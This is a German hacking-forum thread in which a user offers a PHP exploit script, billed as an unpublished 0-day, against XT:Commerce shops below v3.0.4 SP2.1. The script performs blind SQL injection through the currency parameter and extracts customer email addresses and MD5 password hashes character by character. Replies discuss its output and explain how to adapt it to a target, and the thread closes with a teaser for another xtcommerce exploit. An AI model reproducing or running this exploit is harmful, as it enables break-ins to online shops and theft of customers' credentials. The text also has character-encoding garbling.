XT:Commerce < v3.0.4 SP2.1 Currency.Class SQL Injection Vulnerability

//ins0.! · 22. Februar 2009

Dieser Exploit war nonpub ... die SicherheitslÃ¼cke wurde von XT Commerce erst sehr spÃ¤t endeckt ,
Und ich kenne bis jetzt keinen Public gewordenen Exploit. Also ist meiner quasi noch nonpub...

der code ist kein vorschaucode ...

greez ins0

[HIDE]

PHP

#!/usr/bin/php -q
<?php
/*************************************************************************
 * XT:Commerce < v3.0.4 SP2.1 Currency.Class SQL Injection Vulnerability *
 * 2008 //ins0.! - 0-day development                                     *
 *************************************************************************/






$alpha_low = array(    '.',
                    '@',
                    'a',
                    'b',
                    'c',
                    'd',
                    'e',
                    'f',
                    'g',
                    'h',
                    'i',
                    'j',
                    'k',
                    'l',
                    'm',
                    'n',
                    'o',
                    'p',
                    'q',
                    'r',
                    's',
                    't',
                    'u',
                    'v',
                    'w',
                    'x',
                    'y',
                    'z');

$numbers = array(    '0',
                    '1',
                    '2',
                    '3',
                    '4',
                    '5',
                    '6',
                    '7',
                    '8',
                    '9');


$correct_chars = '';
$md5_string = '';


for($x = 0; $x < count($alpha_low); $x++){

    $char_string = $correct_chars.ord($alpha_low[$x]).',';
    $query_string = &quot;http://www.shopyurl.com/?currency='+OR+code=(SELECT+if(count(customers_password)=1,CHAR(69,85,82),0)+as+currencies_id+FROM+customers+WHERE+customers_id=1+AND+customers_email_address+LIKE+CHAR(&quot;.$char_string.&quot;37))/*&manufacturers_id='&quot;;

    $source = file_get_contents($query_string);

    if(preg_match('#EUR#iU', $source) == 0){
        $correct_chars .= ord($alpha_low[$x]).',';
        $md5_string .= $alpha_low[$x];
        echo &quot;>>>>> FOUND -> '&quot;.$alpha_low[$x].&quot;' MD5 = &quot;.$md5_string.&quot;\r\n\r\n\r\n&quot;;
        $x = -1;
        continue;
    }else{
        echo '\''.$alpha_low[$x].'\' => '.preg_match('#EUR#iU', $source).&quot;\r\n&quot;;
    }


    if($x == 27){


        for($y = 0; $y < count($numbers); $y++){

            $char_string = $correct_chars.ord($numbers[$y]).',';
            $query_string = &quot;http://www.shopyurl.com/?currency='+OR+code=(SELECT+if(count(customers_password)=1,CHAR(69,85,82),0)+as+currencies_id+FROM+customers+WHERE+customers_id=1+AND+customers_password+LIKE+CHAR(&quot;.$char_string.&quot;37))/*&manufacturers_id='&date=&quot;.time();

            $source = file_get_contents($query_string);

            if(preg_match('#EUR#iU', $source) == 0){
                $correct_chars .= ord($numbers[$y]).',';
                $md5_string .= $numbers[$y];
                echo &quot;>>>>> FOUND -> '&quot;.$numbers[$y].&quot;' MD5 = &quot;.$md5_string.&quot;\r\n\r\n\r\n&quot;;
                $y = 15;
            }else{
                echo '\''.$numbers[$y].'\' => '.preg_match('#EUR#iU', $source).&quot;\r\n&quot;;
            }


        }    
        $x = -1;
    }
}


echo &quot;\r\n\r\n\r\n&quot;;
echo &quot;>>>> Break! MD5: => &quot;.$md5_string.&quot;\r\n&quot;;








?>

Alles anzeigen

[/HIDE]

Der Code ist funktionstÃ¼chig und fÃ¼r PW + Email geeignet jedoch muss er angepasst werden.#

whit3 · 26. Februar 2009

das einzige was das teil liefert is

Code

'.' => 1 '@' => 1 'a' => 1 'b' => 1 'c' => 1 'd' => 1 'e' => 1 'f' => 1 'g' => 1 'h' => 1 'i' => 1 'j' => 1 'k' => 1 'l' => 1 'm' => 1 'n' => 1 'o' => 1 'p' => 1 'q' => 1 'r' => 1 's' => 1 't' => 1 'u' => 1 'v' => 1 'w' => 1 'x' => 1 'y' => 1 'z' => 1 '0' => 1 '1' => 1 '2' => 1 '3' => 1 '4' => 1 '5' => 1 '6' => 1 '7' => 1 '8' => 1 '9' => 1 '.' => 1 '@' => 1 'a' => 1 'b' => 1 'c' => 1 'd' => 1 'e' => 1 'f' => 1 'g' => 1 'h' => 1 'i' => 1 'j' => 1 'k' => 1 'l' => 1 'm' => 1 'n' => 1 'o' => 1 'p' => 1 'q' => 1 'r' => 1 's' => 1 't' => 1 'u' => 1 'v' => 1 'w' => 1 'x' => 1 'y' => 1 'z' => 1 '0' => 1 '1' => 1 '2' => 1 '3' => 1 '4' => 1 '5' => 1 '6' => 1 '7' => 1 '8' => 1 '9' => 1 '.' => 1 '@' => 1 'a' => 1 'b' => 1 'c' => 1 'd' => 1 'e' => 1 'f' => 1 'g' => 1 'h' => 1 'i' => 1 'j' => 1 'k' => 1 'l' => 1 'm' => 1 'n' => 1 'o' => 1 'p' => 1 'q' => 1 'r' => 1 's' => 1 't' => 1 'u' => 1 'v' => 1 'w' => 1 'x' => 1 'y' => 1 'z' => 1 '0' => 1 '1' => 1 '2' => 1 '3' => 1 '4' => 1 '5' => 1 '6' => 1 '7' => 1 '8' => 1 '9' => 1 '.' => 1 '@' => 1 'a' => 1 'b' => 1 'c' => 1 'd' => 1 'e' => 1 'f' => 1 'g' => 1 'h' => 1 'i' => 1 'j' => 1 'k' => 1 'l' => 1 'm' => 1 'n' => 1 'o' => 1 'p' => 1 'q' => 1 'r' => 1 's' => 1 't' => 1 'u' => 1 'v' => 1 'w' => 1 'x' => 1 'y' => 1 'z' => 1 '0' => 1 '1' => 1 '2' => 1 '3' => 1 '4' => 1 '5' => 1 '6' => 1 '7' => 1 '8' => 1 '9' => 1 '.' => 1 '@' => 1 'a' => 1 'b' => 1 'c' => 1 'd' => 1 'e' => 1 'f' => 1 'g' => 1 'h' => 1 'i' => 1 'j' => 1 'k' => 1 'l' => 1 'm' => 1 'n' => 1 'o' => 1 'p' => 1 'q' => 1 'r' => 1 's' => 1 't' => 1 'u' => 1 'v' => 1 ' ...

//ins0.! · 26. Februar 2009

jo und das is auch richtig

Zitat: "Der Code ist funktionstÃ¼chig und fÃ¼r PW + Email geeignet jedoch muss er angepasst werden."

Guck dir die Source an und du versteht was der Code eigentlich macht ....

//edit

Wenn du verstehst was der Code eigentlich macht ihn angepasst hast dann funzt er....

bsp:

Code

'.' => 1
'@' => 1
'a' => 1
'b' => 1
'c' => 1
'd' => 1
'e' => 1
'f' => 1
'g' => 1
'h' => 1
'i' => 1
'j' => 1
'k' => 1
'l' => 1
>>>>> FOUND -> 'm' MD5 = m

Alles anzeigen

hast du ihn angepasst und er schmeiÃ?t dir kein "FOUND" raus und wiederholt er sich ... ist er falsch angepasst oder der srv fixed.

//edit 2

das ist der grund warum die lÃ¼cke solange offen war ... wenns nen 0815 exploit wÃ¤hre und jeder ihn tot usen wÃ¼rde

karamble · 3. März 2009

Ich hab hier nochwas vom TÃ¼rken von nebenan

Code

Salaam alaikum wa rahmatullahi wa barakatuh
ben base1001
Size bugÃ¼n, inshaAllah, bir yep yeni Exploit gÃ¶stercem


#############################
ShopSoftware: xtcommerce	#
Vulnerability: /coID/		#
#############################